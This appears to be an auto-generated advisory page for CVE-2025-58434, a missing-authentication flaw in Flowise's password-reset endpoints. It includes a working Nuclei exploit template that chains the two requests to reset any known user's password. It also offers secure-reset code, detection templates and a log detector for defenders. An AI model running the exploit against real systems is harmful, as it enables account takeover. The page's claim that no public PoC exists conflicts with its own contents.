[webapps] Flowise < 3.0.5 - Missing Authentication for Critical Function

CVE-2025-58434

Flowise < 3.0.5: the forgot-password and reset-password endpoints lack authentication, allowing the password of any registered user to be reset.

Critical · CVSS 9.8

📋 Vulnerability Basics

CVE: CVE-2025-58434
Vulnerability type: Missing authentication for critical function
Affected versions: Flowise < 3.0.5
Severity: Critical · CVSS 9.8
Published: 2026-05-13
Submitter: nltt0 (https://github.com/nltt-br)
Source: Exploit-DB (original advisory)

🔬 Root Cause

Flowise's /api/v1/account/forgot-password endpoint generates a temporary token (tempToken) for any registered email address without requiring authentication, and the /api/v1/account/reset-password endpoint then accepts that token to reset the password. Neither endpoint verifies the identity of the requester or the legitimacy of the token's origin, so an attacker can enumerate email addresses and complete password resets.
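The defect above is that the server hands the token back to whoever requested it and then trusts it without further checks. As an added illustration (not Flowise code; a hypothetical minimal Python service with constructed in-memory stores standing in for the database and mailer), this is how the two endpoints look when the token leaves the server only out of band, is stored hashed with an expiry, is compared in constant time, and is single-use:

```python
import hashlib
import hmac
import secrets
import time
from typing import Dict, List, Optional

# Constructed in-memory stores standing in for the application's database
# and mailer (hypothetical example, not Flowise code).
USERS: Dict[str, Dict[str, str]] = {
    "alice@example.com": {"password_hash": hashlib.sha256(b"old-pass").hexdigest()},
}
RESET_TOKENS: dict = {}          # email -> {"token_hash": str, "expires": float}
OUTBOX: List[Dict[str, str]] = []  # simulated email delivery; the only place the token goes

TOKEN_TTL_SECONDS = 15 * 60
GENERIC_REPLY = {"message": "If that account exists, a reset link has been sent."}


def _digest(value: str) -> str:
    # SHA-256 is adequate for a random 256-bit token; for the user's password a
    # real service would use a slow hash such as argon2 or bcrypt instead.
    return hashlib.sha256(value.encode()).hexdigest()


def forgot_password(email: str, now: Optional[float] = None) -> Dict[str, str]:
    """Issue a reset token for a registered email, delivered out of band only.

    The reply is identical whether or not the email is registered and never
    contains the token, so the endpoint neither confirms account existence
    nor hands the token to the caller (the two defects described above).
    """
    now = time.time() if now is None else now
    if email in USERS:
        token = secrets.token_urlsafe(32)
        RESET_TOKENS[email] = {"token_hash": _digest(token), "expires": now + TOKEN_TTL_SECONDS}
        OUTBOX.append({"to": email, "token": token})  # goes to the mailer, not the HTTP reply
    return dict(GENERIC_REPLY)


def reset_password(email: str, token: str, new_password: str,
                   now: Optional[float] = None) -> Dict[str, object]:
    """Consume a reset token: it must exist, be unexpired and match in constant time; it is single-use."""
    now = time.time() if now is None else now
    record = RESET_TOKENS.get(email)
    if record is None or now > record["expires"]:
        RESET_TOKENS.pop(email, None)
        return {"ok": False, "error": "invalid or expired token"}
    if not hmac.compare_digest(record["token_hash"], _digest(token)):
        return {"ok": False, "error": "invalid or expired token"}
    RESET_TOKENS.pop(email)  # burn the token before changing anything
    USERS[email]["password_hash"] = _digest(new_password)
    return {"ok": True, "message": "Password changed"}
```

The `now` parameter exists only so the expiry path can be exercised deterministically; a real handler would also rate-limit both endpoints per source, which is the reverse-proxy mitigation this page recommends.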

🎯 Attack Scenario

1. The attacker knows the target user's registered email address.
2. A POST request is sent to /api/v1/account/forgot-password with a JSON body containing user.email.
3. The endpoint returns 201, and the response contains user.tempToken.
4. A POST request is sent to /api/v1/account/reset-password with a JSON body containing user.email, user.tempToken and user.password.
5. The endpoint resets the password and returns a success flag.

💥 Impact

An attacker can reset the password of any account whose email address is known, without the original password, taking over the account directly and then accessing sensitive data in the system or performing further actions.

⚔️ Nuclei Exploit Template

The following is an exploit template in standard Nuclei v3 format that can be used directly for vulnerability verification:

id: CVE-2025-58434-exploit

info:
  name: Flowise < 3.0.5 - Missing Authentication Password Reset
  author: your-username
  severity: high
  description: |
    Flowise before version 3.0.5 is vulnerable to missing authentication for critical functions.
    This exploit sends a forgot-password request to obtain a temporary token and then
    resets the password for any registered user without proper authorization.
  reference:
    - https://www.exploit-db.com/XXXXX
    - https://nvd.nist.gov/vuln/detail/CVE-2025-58434
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-58434
  tags: cve,cve2025,flowise,unauth

variables:
  email: "{{username}}"
  password: "Exploited@2025"

http:
  - raw:
      - |
        POST {{BaseURL}}/api/v1/account/forgot-password HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"user":{"email":"{{email}}"}}

      - |
        POST {{BaseURL}}/api/v1/account/reset-password HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"user":{"email":"{{email}}","tempToken":"{{temp_token}}","password":"{{password}}"}}

    extractors:
      - type: json
        name: temp_token
        part: body
        internal: true
        json:
          - '.user.tempToken'

    matchers:
      - type: word
        words:
          - "Password changed"
        part: body
        condition: and

      - type: status
        status:
          - 200

🔬 In-depth Technical Analysis

The PoC performs two steps with the requests library:
1. It builds { 'user': { 'email': email } } and sends it to /api/v1/account/forgot-password; if the response is 201, it extracts tempToken from the JSON.
2. It builds { 'user': { 'email': email, 'tempToken': tempToken, 'password': newpassword } } and sends it to /api/v1/account/reset-password, completing the password reset and printing a success message. A status code other than 201 indicates that the user is not registered.

🔍 Nuclei Detection Template

The following detection template determines whether a target is affected:

id: CVE-2025-58434-detection

info:
  name: Flowise < 3.0.5 - Version Detection
  author: your-username
  severity: high
  description: |
    Flowise before version 3.0.5 is vulnerable to missing authentication for critical functions,
    allowing an attacker to reset the password of any registered user without proper authentication.
  reference:
    - https://www.exploit-db.com/XXXXX
    - https://nvd.nist.gov/vuln/detail/CVE-2025-58434
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-58434
  tags: cve,cve2025,flowise,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/version"
      - "{{BaseURL}}/package.json"
      - "{{BaseURL}}/version.txt"

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: word
        words:
          - "Flowise"
        part: body

      - type: regex
        part: body
        regex:
          - '("version":\s*")([0-2]\.\d+\.\d+|3\.0\.[0-4])'
          - 'version\s*=\s*([0-2]\.\d+\.\d+|3\.0\.[0-4])'

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '(\d+\.\d+\.\d+)'
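One caveat for the version regex above: the alternative `3\.0\.[0-4]` is not anchored, so a response reporting `3.0.10` (a patched build) matches on its `3.0.1` prefix and is flagged as vulnerable. A numeric comparison against the fix version avoids that. The following is an added Python example, not part of the advisory or of Flowise; it assumes the probed endpoints return either a JSON object with a top-level `"version"` string or a plain-text `version = x.y.z` line, which is the shape the template's regexes also assume:

```python
import json
import re
from typing import Optional, Tuple

FIXED_VERSION = (3, 0, 5)  # first unaffected version, per the advisory

# Accepts "version = 3.0.4", "version: 3.0.4" and "version=3.0.4" style lines;
# JSON bodies are normalised into that form first.
_VERSION_RE = re.compile(r'version\s*[=:]\s*"?(\d+)\.(\d+)\.(\d+)')


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Extract a numeric (major, minor, patch) tuple from a probe response body."""
    try:
        data = json.loads(text)
        if isinstance(data, dict) and isinstance(data.get("version"), str):
            text = "version=" + data["version"]
    except ValueError:
        pass  # not JSON; fall through to the plain-text pattern
    m = _VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch = (int(g) for g in m.groups())
    return (major, minor, patch)


def is_vulnerable(text: str) -> Optional[bool]:
    """True if the reported version is below 3.0.5, False if not, None if no version was found."""
    version = parse_version(text)
    if version is None:
        return None
    return version < FIXED_VERSION
```

Tuple comparison orders components numerically, so `3.0.10` sorts above `3.0.5` and is reported as not affected, while anything in the `0.x`, `1.x`, `2.x` or `3.0.0`-`3.0.4` range is reported as affected.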

🛡️ Remediation

Upgrade to Flowise >= 3.0.5. As a temporary mitigation, restrict the source IPs allowed to reach /api/v1/account/forgot-password and /api/v1/account/reset-password at the reverse proxy layer, or add a CAPTCHA mechanism.
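While the upgrade or proxy restriction is being rolled out, the two-step pattern described in this advisory is easy to spot in reverse-proxy access logs. The following is an added Python example (not part of the advisory) that flags, per source IP, a forgot-password POST followed by a successful reset-password POST within a short window, and a burst of forgot-password POSTs that suggests email enumeration. The log lines are constructed samples in the combined log format; the thresholds are assumptions to tune for your environment:

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [20/May/2026:08:01:10 +0000] "POST /api/v1/account/forgot-password HTTP/1.1" 201 98 "-" "python-requests/2.31"
203.0.113.7 - - [20/May/2026:08:01:11 +0000] "POST /api/v1/account/forgot-password HTTP/1.1" 201 98 "-" "python-requests/2.31"
203.0.113.7 - - [20/May/2026:08:01:12 +0000] "POST /api/v1/account/forgot-password HTTP/1.1" 404 45 "-" "python-requests/2.31"
203.0.113.7 - - [20/May/2026:08:01:13 +0000] "POST /api/v1/account/reset-password HTTP/1.1" 200 60 "-" "python-requests/2.31"
198.51.100.4 - - [20/May/2026:08:05:00 +0000] "POST /api/v1/account/forgot-password HTTP/1.1" 201 98 "-" "Mozilla/5.0"
198.51.100.4 - - [20/May/2026:08:12:30 +0000] "POST /api/v1/account/reset-password HTTP/1.1" 200 60 "-" "Mozilla/5.0"
192.0.2.9 - - [20/May/2026:08:20:00 +0000] "GET /api/v1/version HTTP/1.1" 200 30 "-" "curl/8.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
FORGOT = "/api/v1/account/forgot-password"
RESET = "/api/v1/account/reset-password"


def parse_line(line: str) -> Optional[dict]:
    """Pull source IP, timestamp, method, path and status out of one combined-format line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return {
        "ip": ip,
        "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
        "method": method,
        "path": path,
        "status": int(status),
    }


def detect(log_text: str, chain_window_s: int = 60,
           enum_threshold: int = 3, enum_window_s: int = 300) -> List[dict]:
    """Return findings for IPs that exhibit the scripted reset chain or a forgot-password burst."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    by_ip: Dict[str, List[dict]] = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    findings = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["time"])
        forgot = [e for e in evs if e["method"] == "POST" and e["path"] == FORGOT]
        resets = [e for e in evs if e["method"] == "POST" and e["path"] == RESET and e["status"] == 200]

        # Rule 1: a successful reset within chain_window_s of a forgot-password from the
        # same IP. A legitimate user must first read the email, so a tight gap is suspicious.
        for r in resets:
            if any(0 <= (r["time"] - f["time"]).total_seconds() <= chain_window_s for f in forgot):
                findings.append({"ip": ip, "rule": "reset-chain", "at": r["time"].isoformat()})
                break

        # Rule 2: enum_threshold or more forgot-password POSTs inside a sliding window of
        # enum_window_s, regardless of status, which is what trying many emails looks like.
        for i in range(len(forgot)):
            j = i
            while j + 1 < len(forgot) and (forgot[j + 1]["time"] - forgot[i]["time"]).total_seconds() <= enum_window_s:
                j += 1
            if j - i + 1 >= enum_threshold:
                findings.append({"ip": ip, "rule": "forgot-burst", "count": j - i + 1})
                break
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

On the sample, only 203.0.113.7 is flagged (on both rules); 198.51.100.4 performs the same two requests seven minutes apart, which is what a human following an emailed link looks like, and is left alone. Because the email address travels in the POST body, access logs alone cannot say which accounts were targeted; correlate the flagged window with the application's own logs for that.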

📎 References

🚨 Threat Assessment

📈 EPSS exploitation probability: no data
🚨 CISA KEV: no known exploitation
🔧 Public PoC: none available

⚠️ This article is based on public vulnerability databases and is intended for security research and defensive reference only. Generated: 2026-05-20 08:08 | Source: Exploit-DB

[!] CONTACT_CHANNELS

For business cooperation, technical consulting or vulnerability feedback, contact the author through the following offshore channels.

> PING_AUTHOR (@A1RedTeam)